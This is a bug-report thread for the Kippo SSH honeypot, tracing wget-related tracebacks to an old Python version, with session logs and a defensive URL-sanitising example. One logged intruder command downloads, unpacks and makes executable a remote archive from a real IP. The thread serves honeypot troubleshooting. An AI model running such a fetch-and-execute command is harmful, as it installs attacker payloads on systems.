desaster / kippo

Kippo - SSH Honeypot

traceback when wget is used #38

Closed ghost closed 10 years ago

ghost commented 10 years ago

From nick@silkey.org on March 04, 2011 21:22:06

What steps will reproduce the problem?

1. use wget in honeypot
2. kippo generates tracebacks ; honeypot freezes up + times out

What is the expected output? What do you see instead?

I expect hack0rs to pull down their rootkits without issue. ;)

wget is available outside of the honeypot ; there is no egress/OUTPUT filter on the OS hosting the honeypot

What version of the product are you using? On what operating system?

kippo 0.5 atop i386 CentOS 5.5 Xen DomU within i386 CentOS 5.5 Dom0

Please provide any additional information below.

Traceback:

2011-03-04 10:05:10-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 89.123.100.59:26067 (xxx.xxx.xxx.xxx:2222) [session: 8330]
2011-03-04 10:05:10-0500 [HoneyPotTransport,8330,89.123.100.59] Remote SSH version: SSH-2.0-PuTTY_Release_0.60
2011-03-04 10:05:10-0500 [HoneyPotTransport,8330,89.123.100.59] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2011-03-04 10:05:10-0500 [HoneyPotTransport,8330,89.123.100.59] outgoing: aes256-ctr hmac-sha1 none
2011-03-04 10:05:10-0500 [HoneyPotTransport,8330,89.123.100.59] incoming: aes256-ctr hmac-sha1 none
2011-03-04 10:05:11-0500 [HoneyPotTransport,8330,89.123.100.59] NEW KEYS
2011-03-04 10:05:11-0500 [HoneyPotTransport,8330,89.123.100.59] starting service ssh-userauth
2011-03-04 10:05:11-0500 [SSHService ssh-userauth on HoneyPotTransport,8330,89.123.100.59] root trying auth none
2011-03-04 10:05:11-0500 [SSHService ssh-userauth on HoneyPotTransport,8330,89.123.100.59] root trying auth keyboard-interactive
2011-03-04 10:05:14-0500 [SSHService ssh-userauth on HoneyPotTransport,8330,89.123.100.59] login attempt [root/123456] succeeded
2011-03-04 10:05:14-0500 [SSHService ssh-userauth on HoneyPotTransport,8330,89.123.100.59] root authenticated with keyboard-interactive
2011-03-04 10:05:14-0500 [SSHService ssh-userauth on HoneyPotTransport,8330,89.123.100.59] starting service ssh-connection
2011-03-04 10:05:14-0500 [SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] got channel session request
2011-03-04 10:05:14-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] channel open
2011-03-04 10:05:14-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] pty request: xterm (24L, 80L, 0L, 0L)
2011-03-04 10:05:14-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Terminal size: 24 80
2011-03-04 10:05:15-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] getting shell
2011-03-04 10:05:15-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Opening TTY log: log/tty/20110304-100515-7572.log
2011-03-04 10:05:17-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] CMD: w
2011-03-04 10:05:17-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Command found: w
2011-03-04 10:05:20-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] CMD: ps x
2011-03-04 10:05:20-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Command found: ps x
2011-03-04 10:05:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] CMD: cat /proc/cpuinfo
2011-03-04 10:05:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Command found: cat /proc/cpuinfo
2011-03-04 10:05:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Updating realfile to honeyfs//proc/cpuinfo
2011-03-04 10:05:40-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] CMD: wget http://208.75.230.43/driftkingdst/Stest.tgz ; tar zxvf Stest.tgz ; cd .s ; chmod +x
2011-03-04 10:05:40-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Command found: wget http://208.75.230.43/driftkingdst/Stest.tgz
2011-03-04 10:05:40-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Unhandled Error
Traceback (most recent call last):
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/service.py", line 44, in packetReceived
    return f(packet)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/connection.py", line 243, in ssh_CHANNEL_DATA
    log.callWithLogger(channel, channel.dataReceived, data)
--- <exception caught here> ---
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/log.py", line 69, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/session.py", line 106, in dataReceived
    self.client.transport.write(data)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/session.py", line 157, in write
    self.proto.dataReceived(data)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/insults/insults.py", line 431, in dataReceived
    self.terminalProtocol.keystrokeReceived(ch, None)
  File "/opt/kippo-0.5/kippo/core/honeypot.py", line 243, in keystrokeReceived
    recvline.HistoricRecvLine.keystrokeReceived(self, keyID, modifier)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/recvline.py", line 198, in keystrokeReceived
    m()
  File "/opt/kippo-0.5/kippo/core/honeypot.py", line 270, in handle_RETURN
    return recvline.RecvLine.handle_RETURN(self)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/recvline.py", line 256, in handle_RETURN
    ...

Original issue: http://code.google.com/p/kippo/issues/detail?id=38

ghost commented 10 years ago

From nick@silkey.org on March 04, 2011 12:47:20

I make kippo traceback just wgetting the Googs:

2011-03-04 15:30:30-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 76.127.176.170:61593 (xx.xx.xx.xx:2222) [session: 8337]
2011-03-04 15:30:30-0500 [HoneyPotTransport,8337,76.127.176.170] Remote SSH version: SSH-2.0-OpenSSH_5.2
2011-03-04 15:30:30-0500 [HoneyPotTransport,8337,76.127.176.170] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2011-03-04 15:30:30-0500 [HoneyPotTransport,8337,76.127.176.170] outgoing: aes128-ctr hmac-md5 none
2011-03-04 15:30:30-0500 [HoneyPotTransport,8337,76.127.176.170] incoming: aes128-ctr hmac-md5 none
2011-03-04 15:30:30-0500 [HoneyPotTransport,8337,76.127.176.170] NEW KEYS
2011-03-04 15:30:30-0500 [HoneyPotTransport,8337,76.127.176.170] starting service ssh-userauth
2011-03-04 15:30:30-0500 [SSHService ssh-userauth on HoneyPotTransport,8337,76.127.176.170] root trying auth none
2011-03-04 15:30:30-0500 [SSHService ssh-userauth on HoneyPotTransport,8337,76.127.176.170] root trying auth keyboard-interactive
2011-03-04 15:30:33-0500 [SSHService ssh-userauth on HoneyPotTransport,8337,76.127.176.170] login attempt [root/123456] succeeded
2011-03-04 15:30:33-0500 [SSHService ssh-userauth on HoneyPotTransport,8337,76.127.176.170] root authenticated with keyboard-interactive
2011-03-04 15:30:33-0500 [SSHService ssh-userauth on HoneyPotTransport,8337,76.127.176.170] starting service ssh-connection
2011-03-04 15:30:33-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got channel session request
2011-03-04 15:30:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] channel open
2011-03-04 15:30:33-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global no-more-sessions@openssh.com request
2011-03-04 15:30:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] unhandled request for auth-agent-req@openssh.com
2011-03-04 15:30:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] pty request: xterm-color (24L, 80L, 560L, 336L)
2011-03-04 15:30:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] Terminal size: 24 80
2011-03-04 15:30:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] getting shell
2011-03-04 15:30:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] Opening TTY log: log/tty/20110304-153033-1555.log
2011-03-04 15:30:38-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] CMD: wget google.com
2011-03-04 15:30:38-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] Command found: wget google.com
2011-03-04 15:30:38-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] Unhandled Error
Traceback (most recent call last):
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/service.py", line 44, in packetReceived
    return f(packet)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/connection.py", line 243, in ssh_CHANNEL_DATA
    log.callWithLogger(channel, channel.dataReceived, data)
--- <exception caught here> ---
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/log.py", line 69, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/session.py", line 106, in dataReceived
    self.client.transport.write(data)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/session.py", line 157, in write
    self.proto.dataReceived(data)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/insults/insults.py", line 431, in dataReceived
    self.terminalProtocol.keystrokeReceived(ch, None)
  File "/opt/kippo-0.5/kippo/core/honeypot.py", line 243, in keystrokeReceived
    recvline.HistoricRecvLine.keystrokeReceived(self, keyID, modifier)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/recvline.py", line 198, in keystrokeReceived
    m()
  File "/opt/kippo-0.5/kippo/core/honeypot.py", line 270, in handle_RETURN
    return recvline.RecvLine.handle_RETURN(self)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/recvline.py", line 256, in handle_RETURN
    self.lineReceived(line)
  File "/opt/kippo-0.5/kippo/core/honeypot.py", line 237, in lineReceived
    self.cmdstack[-1].lineReceived(line)
  File "/opt/kippo-0.5/kippo/core/honeypot.py", line 67, in lineReceived
    self.runCommand()
  File "/opt/kippo-0.5/kippo/core/honeypot.py", line 119, in runCommand
    self.honeypot.call_command(cmdclass, *rargs)
  File "/opt/kippo-0.5/kippo/core/honeypot.py", line 263, in call_command
    obj.start()
  File "/opt/kippo-0.5/kippo/commands/wget.py", line 60, in start
    outfile = urldata.path.split('/')[-1]
exceptions.AttributeError: 'tuple' object has no attribute 'path'

2011-03-04 15:44:20-0500 [HoneyPotTransport,8337,76.127.176.170] connection lost

ghost commented 10 years ago

From desaster on March 04, 2011 13:12:26

Hmmm I think I've changed that code to use another url parser....

Can you check if you have the problem with the svn version? https://code.google.com/p/kippo/source/checkout

I'll look into it a bit closer later, but this is just something that comes to mind right away

ghost commented 10 years ago

From nick@silkey.org on March 04, 2011 19:36:20

I grabbed trunk. Startup tracebacks about no hashlib. Installed. Started fine. Similar situation of tracebacks when clients within the honeypot attempt to wget:

2011-03-04 22:24:20-0500 [-] Log opened.
2011-03-04 22:24:20-0500 [-] twistd 10.2.0 (/usr/bin/python 2.4.3) starting up.
2011-03-04 22:24:20-0500 [-] reactor class: twisted.internet.selectreactor.SelectReactor.
2011-03-04 22:24:20-0500 [-] kippo.core.honeypot.HoneyPotSSHFactory starting on 2222
2011-03-04 22:24:20-0500 [-] Starting factory <kippo.core.honeypot.HoneyPotSSHFactory instance at 0xb7ae75cc>
2011-03-04 22:24:35-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 76.127.176.170:62511 (xx.xx.xx.xx:2222) [session: 0]
2011-03-04 22:24:36-0500 [HoneyPotTransport,0,76.127.176.170] Remote SSH version: SSH-2.0-OpenSSH_5.2
2011-03-04 22:24:36-0500 [HoneyPotTransport,0,76.127.176.170] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2011-03-04 22:24:36-0500 [HoneyPotTransport,0,76.127.176.170] outgoing: aes128-ctr hmac-md5 none
2011-03-04 22:24:36-0500 [HoneyPotTransport,0,76.127.176.170] incoming: aes128-ctr hmac-md5 none
2011-03-04 22:24:37-0500 [HoneyPotTransport,0,76.127.176.170] connection lost
2011-03-04 22:24:43-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 76.127.176.170:62512 (xx.xx.xx.xx:2222) [session: 1]
2011-03-04 22:24:43-0500 [HoneyPotTransport,1,76.127.176.170] Remote SSH version: SSH-2.0-OpenSSH_5.2
2011-03-04 22:24:43-0500 [HoneyPotTransport,1,76.127.176.170] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2011-03-04 22:24:43-0500 [HoneyPotTransport,1,76.127.176.170] outgoing: aes128-ctr hmac-md5 none
2011-03-04 22:24:43-0500 [HoneyPotTransport,1,76.127.176.170] incoming: aes128-ctr hmac-md5 none
2011-03-04 22:24:45-0500 [HoneyPotTransport,1,76.127.176.170] NEW KEYS
2011-03-04 22:24:45-0500 [HoneyPotTransport,1,76.127.176.170] starting service ssh-userauth
2011-03-04 22:24:45-0500 [SSHService ssh-userauth on HoneyPotTransport,1,76.127.176.170] root trying auth none
2011-03-04 22:24:45-0500 [SSHService ssh-userauth on HoneyPotTransport,1,76.127.176.170] root trying auth keyboard-interactive
2011-03-04 22:24:48-0500 [SSHService ssh-userauth on HoneyPotTransport,1,76.127.176.170] login attempt [root/123456] succeeded
2011-03-04 22:24:48-0500 [SSHService ssh-userauth on HoneyPotTransport,1,76.127.176.170] root authenticated with keyboard-interactive
2011-03-04 22:24:48-0500 [SSHService ssh-userauth on HoneyPotTransport,1,76.127.176.170] starting service ssh-connection
2011-03-04 22:24:48-0500 [SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] got channel session request
2011-03-04 22:24:48-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] channel open
2011-03-04 22:24:48-0500 [SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] got global no-more-sessions@openssh.com request
2011-03-04 22:24:48-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] unhandled request for auth-agent-req@openssh.com
2011-03-04 22:24:48-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] pty request: xterm-color (24L, 80L, 560L, 336L)
2011-03-04 22:24:48-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] Terminal size: 24 80
2011-03-04 22:24:48-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] getting shell
2011-03-04 22:24:48-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] Opening TTY log: log/tty/20110304-222448-7545.log
2011-03-04 22:24:50-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] /etc/motd resolved into /etc/motd
2011-03-04 22:24:50-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] /var/run/motd resolved into /var/run/motd
2011-03-04 22:24:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] CMD: wget google.com
2011-03-04 22:24:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] Command found: wget google.com
2011-03-04 22:24:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] Unhandled Error
Traceback (most recent call last):
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/service.py", line 44, in packetReceived
    return f(packet)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/connection.py", line 243, in ssh_CHANNEL_DATA
    log.callWithLogger(channel, channel.dataReceived, data)
--- <exception caught here> ---
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/log.py", line 69, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/session.py", line 106, in dataReceived
    self.client.transport.write(data)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/session.py", line 157, in write
    self.proto.dataReceived(data)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/insults/insults.py", line 431, in dataReceived
    self.terminalProtocol.keystrokeReceived(ch, None)
  File "/opt/kippo/kippo/core/honeypot.py", line 350, in keystrokeReceived
    recvline.HistoricRecvLine.keystrokeReceived(self, keyID, modifier)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/recvline.py", line 198, in keystrokeReceived
    m()
  File "/opt/kippo/kippo/core/honeypot.py", line 377, in handle_RETURN
    return recvline.RecvLine.handle_RETURN(self)
  File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/recvline.py", line 256, in handle_RETURN
    self.lineReceived(line)
  File "/opt/kippo/kippo/core/honeypot.py", line 344, in lineReceived
    self.cmdstack[-1].lineReceived(line)
  File "/opt/kippo/kippo/core/honeypot.py", line 73, in lineReceived
    self.runCommand()
  File "/opt/kippo/kippo/core/honeypot.py", line 126, in runCommand
    self.honeypot.call_command(cmdclass, *rargs)
  File "/opt/kippo/kippo/core/honeypot.py", line 370, in call_command
    obj.start()
  File "/opt/kippo/kippo/commands/wget.py", line 60, in start
    outfile = urldata.path.split('/')[-1]
exceptions.AttributeError: 'tuple' object has no attribute 'path'

2011-03-04 22:25:04-0500 [SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] got global keepalive@openssh.com request

ghost commented 10 years ago

From desaster on March 05, 2011 07:32:15

Ah, sorry, these changes were in my unfinished work and not yet in svn.

However, the actual reason why you're getting the traceback right now is that you seem to be running an older version of python (python 2.4.3). The minimum required version for kippo is 2.5.

Kippo has been developed using 2.5+, and even if this particular problem is worked around, there will likely be more version-related problems.

Having tested kippo on CentOS 5, I understand it's a bit of a pain because there's no simple upgrade path to a newer python version. Check out my notes on CentOS installation here: https://code.google.com/p/kippo/wiki/KippoOnLinux

I'll close this issue as WontFix, since the problem is not there on a newer python version, and I'm just too lazy to go back to python 2.4 :(

Status: WontFix

ghost commented 10 years ago

From nick@silkey.org on March 05, 2011 11:23:57

Bada-bing. Jumping to 2.6 resolved this issue:

2011-03-05 14:18:42-0500 [-] Log opened.
2011-03-05 14:18:42-0500 [-] twistd 10.2.0 (/usr/bin/python26 2.6.5) starting up.
2011-03-05 14:18:42-0500 [-] reactor class: twisted.internet.selectreactor.SelectReactor.
2011-03-05 14:18:42-0500 [-] kippo.core.honeypot.HoneyPotSSHFactory starting on 2222
2011-03-05 14:18:42-0500 [-] Starting factory <kippo.core.honeypot.HoneyPotSSHFactory instance at 0xa393fcc>
2011-03-05 14:18:51-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 76.127.176.170:49853 (xx.xx.xx.xx:2222) [session: 0]
2011-03-05 14:18:51-0500 [HoneyPotTransport,0,76.127.176.170] Remote SSH version: SSH-2.0-OpenSSH_5.2
2011-03-05 14:18:51-0500 [HoneyPotTransport,0,76.127.176.170] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2011-03-05 14:18:51-0500 [HoneyPotTransport,0,76.127.176.170] outgoing: aes128-ctr hmac-md5 none
2011-03-05 14:18:51-0500 [HoneyPotTransport,0,76.127.176.170] incoming: aes128-ctr hmac-md5 none
2011-03-05 14:18:52-0500 [HoneyPotTransport,0,76.127.176.170] NEW KEYS
2011-03-05 14:18:52-0500 [HoneyPotTransport,0,76.127.176.170] starting service ssh-userauth
2011-03-05 14:18:52-0500 [SSHService ssh-userauth on HoneyPotTransport,0,76.127.176.170] root trying auth none
2011-03-05 14:18:52-0500 [SSHService ssh-userauth on HoneyPotTransport,0,76.127.176.170] root trying auth keyboard-interactive
2011-03-05 14:18:53-0500 [SSHService ssh-userauth on HoneyPotTransport,0,76.127.176.170] login attempt [root/123456] succeeded
2011-03-05 14:18:53-0500 [SSHService ssh-userauth on HoneyPotTransport,0,76.127.176.170] root authenticated with keyboard-interactive
2011-03-05 14:18:53-0500 [SSHService ssh-userauth on HoneyPotTransport,0,76.127.176.170] starting service ssh-connection
2011-03-05 14:18:53-0500 [SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] got channel session request
2011-03-05 14:18:53-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] channel open
2011-03-05 14:18:53-0500 [SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] got global no-more-sessions@openssh.com request
2011-03-05 14:18:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] unhandled request for auth-agent-req@openssh.com
2011-03-05 14:18:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] pty request: xterm-color (24, 80, 560, 336)
2011-03-05 14:18:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] Terminal size: 24 80
2011-03-05 14:18:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] getting shell
2011-03-05 14:18:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] Opening TTY log: log/tty/20110305-141854-57.log
2011-03-05 14:18:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] /etc/motd resolved into /etc/motd
2011-03-05 14:18:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] /var/run/motd resolved into /var/run/motd
2011-03-05 14:18:58-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] CMD: wget google.com
2011-03-05 14:18:58-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] Command found: wget google.com
2011-03-05 14:18:58-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] Starting factory <HTTPProgressDownloader: http://google.com >
2011-03-05 14:18:58-0500 [HTTPPageDownloader,client] Updating realfile to dl/20110305141858_http___google_com
2011-03-05 14:18:58-0500 [HTTPPageDownloader,client] Stopping factory <HTTPProgressDownloader: http://www.google.com/ >

Thanks.
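Added example, not kippo's code and not part of the original thread: the traceback above comes from reading `.path` on the result of URL parsing, which Python 2.4 returned as a plain 6-tuple (named fields arrived in 2.5). The sketch below reads the path in a way that works for both forms and derives the two names an emulated wget needs. The helper names are hypothetical, and the host-side naming scheme is an assumption inferred from the "Updating realfile to" log line above.

```python
import re
from urllib.parse import urlparse  # Python 3; the thread's code used Python 2's urlparse module


def url_path(parsed):
    """Return the path whether `parsed` has named fields or is a plain tuple.

    Index 2 is the path component in both forms, so the fallback covers the
    Python 2.4 case that raised AttributeError in the traceback.
    """
    try:
        return parsed.path
    except AttributeError:
        return parsed[2]


def with_scheme(url):
    """'wget google.com' carries no scheme; without one the host parses as a path."""
    return url if "://" in url else "http://" + url


def display_name(url):
    """File name shown to the intruder, taken from the last path segment."""
    name = url_path(urlparse(with_scheme(url))).split("/")[-1]
    return name or "index.html"  # real wget falls back to index.html


def quarantine_name(url, stamp):
    """Host-side file name: only [A-Za-z0-9_] survives from the attacker's URL,
    so separators and dots in the URL cannot steer where the sample is written."""
    return "%s_%s" % (stamp, re.sub(r"[^A-Za-z0-9]", "_", with_scheme(url)))


if __name__ == "__main__":
    # Constructed inputs; example.test is a reserved test domain.
    for u in ("google.com", "http://example.test/a/../../etc/passwd"):
        print(display_name(u), quarantine_name(u, "20110305141858"))
```

The name shown to the intruder and the name written on the honeypot host are kept separate, so only the sanitized one ever reaches the file system.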

ghost commented 10 years ago

From nick@silkey.org on March 05, 2011 11:31:33

FYI: some fresh, more-efficient steps on bootstrapping CentOS for Kippo via EPEL. Consider putting this in the wiki? https://gist.github.com/856645 Ciao. Thanks for the fun toys.